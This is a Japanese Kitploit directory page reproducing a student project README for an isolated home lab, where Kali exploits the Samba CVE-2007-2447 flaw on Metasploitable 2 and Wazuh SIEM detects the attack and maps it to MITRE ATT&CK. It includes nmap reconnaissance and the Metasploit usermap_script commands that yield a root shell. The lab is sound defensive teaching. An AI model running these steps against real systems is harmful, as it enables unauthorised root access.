Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — 隔離されたAD/Linux攻撃ラボ: Metasploit経由でCVE-2007-2447を悪用し、MITRE ATT&CK (T1190, T1059) にマッピングされたWazuh SIEMで検出 | Kitploit
ツール/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
偵察エクスプロイトフレームワーク脆弱性分析エクスプロイトペネトレーションテスト脅威インテリジェンス侵入検知学習と教育ログ分析

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ラボと実践
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

隔離されたAD/Linux攻撃ラボ: Metasploit経由でCVE-2007-2447を悪用し、MITRE ATT&CK (T1190, T1059) にマッピングされたWazuh SIEMで検出

リポジトリを見る
4日前未レビュー

🛡️ CVE-2007-2447 悪用 & SIEM検知ラボ (Wazuh + MITRE ATT&CK)

B.Tech プロジェクト (BTP) | IIIT Pune 基盤: 「Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring」 — ICCCNT 2023, IIT Delhi

無料・オープンソースツールのみを使用して単一マシン上に構築した、完全動作するサイバーセキュリティホームラボ。このラボは、偵察 → 悪用 → 検知という実世界の攻撃ライフサイクルをシミュレートし、SIEMが攻撃をリアルタイムで検知してMITRE ATT&CKフレームワークにマッピングする方法を実演します。


📐 ラボ構成

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser
VM役割IPツール
Kali Linux 2026.1攻撃者10.0.0.1Nmap, Metasploit
Metasploitable 2被害者10.0.0.220以上の脆弱性
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5

🧰 ツールと技術


🔧 セットアップガイド

前提条件

  • 少なくとも 16 GB RAM を搭載したマシン(3台すべてのVMを同時に実行)
  • VirtualBox 7.x がインストール済み
  • 約50 GBの空きディスク容量

ステップ 1 — VirtualBoxでのネットワーク設定

VirtualBoxで cyberlab という名前の内部ネットワークを作成します。3台すべてのVMにこのアダプターを割り当てます。Ubuntu/Wazuh VMには、ブラウザからダッシュボードにアクセスできるように、追加のホストオンリーアダプターを割り当てます。


ステップ 2 — Kali Linux(攻撃者)

  1. Kali Linux VirtualBoxイメージ をダウンロード
  2. インポートして cyberlab 内部ネットワークアダプターを割り当てる
  3. 静的IPを設定:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. ネットワークを再起動: sudo systemctl restart networking

ステップ 3 — Metasploitable 2(被害者)

  1. Metasploitable 2 をダウンロード
  2. VirtualBoxにインポートし、cyberlab ネットワークを割り当てる
  3. 静的IPを設定:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ Metasploitable 2をインターネットに公開しないでください。 意図的に安全でない構成になっています。


ステップ 4 — Ubuntu + Wazuh SIEM(防御側)

  1. Ubuntu Server 22.04 をインストール
  2. 2つのアダプターを割り当て: cyberlab 内部 + ホストオンリー
  3. netplanで静的IPを設定 (/etc/netplan/01-network-manager-all.yaml):
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. Wazuhをインストール(シングルノード):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. ダッシュボードにアクセス: https://192.168.56.103(ホストのブラウザから)

ステップ 5 — Syslog経由でMetasploitableをWazuhに接続

Metasploitable 2はWazuhエージェントを実行できないため、エージェントレス監視用にsyslog転送を構成します:

Metasploitableで、/etc/rsyslog.conf に追記:

root@kitploit:~
*.* @10.0.0.3:514

Wazuh(Ubuntu)で、/var/ossec/etc/ossec.conf のsyslog入力を有効化:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

Wazuhを再起動: sudo systemctl restart wazuh-manager


⚔️ 攻撃シミュレーション

フェーズ 1 — 偵察(Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

Metasploitable 2で発見された主要サービス:

20以上のオープンポートを発見。OSフィンガープリント: Linux 2.6.x


フェーズ 2 — 悪用(Metasploit)

脆弱性: CVE-2007-2447 — Samba usermap_script コマンドインジェクション

Samba 3.0.0–3.0.25rc3 において、不正なMS-RPCリクエストを介して認証なしのリモートコード実行を可能にします。

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

フェーズ 3 — 検知(Wazuh SIEM)

エクスプロイト後、Wazuhは自動的にイベントを検知し、MITRE ATT&CK にマッピングしました:

検知されたイベント総数: 55以上

ダッシュボード https://192.168.56.103 → Security Events → MITRE ATT&CK にアクセス


📊 主な結果

  • ✅ 隔離環境で攻撃ライフサイクル全体の再現に成功
  • ✅ CVE-2007-2447により数秒で認証なしのrootシェルを獲得
  • ✅ Wazuh SIEMがすべての攻撃をリアルタイムで検知しMITRE ATT&CKにマッピング
  • ✅ syslog転送によりレガシーなMetasploitableシステムのエージェントレス監視を実現
  • ✅ ラボ全体を16 GB RAMの単一ホストマシン上で稼働

📁 リポジトリ構成

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← You are here
├── network-config/
│   ├── kali-interfaces.txt    ← Kali static IP config
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan config
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent config
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Reference research paper

🔗 参考文献

Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ 免責事項

このラボは完全に隔離された仮想マシン上に構築されており、攻撃シミュレーション中はインターネットアクセスはありません。すべてのツールと技術は、管理された環境内での教育目的にのみ厳密に使用されます。所有していないシステム、またはテストする明示的な許可を得ていないシステムに対して、攻撃技術を再現しようとしないでください。


Harshita Verma 発表 | IIIT Pune

ツールをダウンロード
ツールバージョン用途
VirtualBox7.xハイパーバイザー — すべてのVMを1台のホスト上で実行
Kali Linux2026.1ペネトレーションテスト用OS(攻撃側)
Metasploitable 2v2.0意図的に脆弱なターゲット
Wazuhv4.7.5オープンソースSIEM(防御側)
Nmap最新ネットワーク/ポートスキャン
Metasploit Framework最新エクスプロイトフレームワーク
ポートサービスバージョン
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3
ルールID説明MITREテクニック戦術
5402rootへのsudo成功T1548.003権限昇格
5501PAM: ログインセッション開始T1078初期アクセス / 永続化
5502PAM: ログインセッション終了T1078防御回避
502Wazuhサーバー起動—検知アクティブ